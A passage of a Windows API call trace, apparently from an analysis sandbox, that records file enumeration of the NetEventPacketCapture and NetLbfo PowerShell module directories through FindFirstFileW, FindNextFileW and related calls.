ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.067] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.068] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0265.068] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.068] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.068] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.068] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0265.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.068] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.068] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0265.069] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\", lpFilePart=0x0) returned 0x49 [0265.069] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.069] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.069] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.cdxml", cAlternateFileName="")) returned 1 [0265.069] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventNetworkAdapter.format.ps1xml", cAlternateFileName="")) returned 1 [0265.069] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.070] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x150e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventPacketCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.070] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c41, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.cdxml", cAlternateFileName="")) returned 1 [0265.070] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.070] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c48, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.cdxml", cAlternateFileName="")) returned 1 [0265.094] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventSession.format.ps1xml", cAlternateFileName="")) returned 1 [0265.094] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.cdxml", cAlternateFileName="")) returned 1 [0265.095] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmNetworkAdatper.format.ps1xml", cAlternateFileName="")) returned 1 [0265.095] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.cdxml", cAlternateFileName="")) returned 1 [0265.095] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventVmSwitch.format.ps1xml", cAlternateFileName="")) returned 1 [0265.095] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.cdxml", cAlternateFileName="")) returned 1 [0265.095] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetEventWFPCaptureProvider.format.ps1xml", cAlternateFileName="")) returned 1 [0265.096] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.psd1", cAlternateFileName="")) returned 1 [0265.096] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.096] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103c4961, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103c4961, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103c4961, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.096] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.096] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1")) returned 0x20 [0265.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.097] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0265.097] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0265.097] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8db140 [0265.097] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.097] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10ffca0f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10ffca0f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10ffca0f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.cdxml", cAlternateFileName="")) returned 1 [0265.097] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeam.format.ps1xml", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1684, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.cdxml", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamMember.format.ps1xml", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.cdxml", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1270, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetLbfoTeamNic.format.ps1xml", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.psd1", cAlternateFileName="")) returned 1 [0265.098] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.099] FindNextFileW (in: hFindFile=0x1a8db140, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11022c65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2163, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.099] FindClose (in: hFindFile=0x1a8db140 | out: hFindFile=0x1a8db140) returned 1 [0265.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0265.099] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\", lpFilePart=0x0) returned 0x3b [0265.099] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.099] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 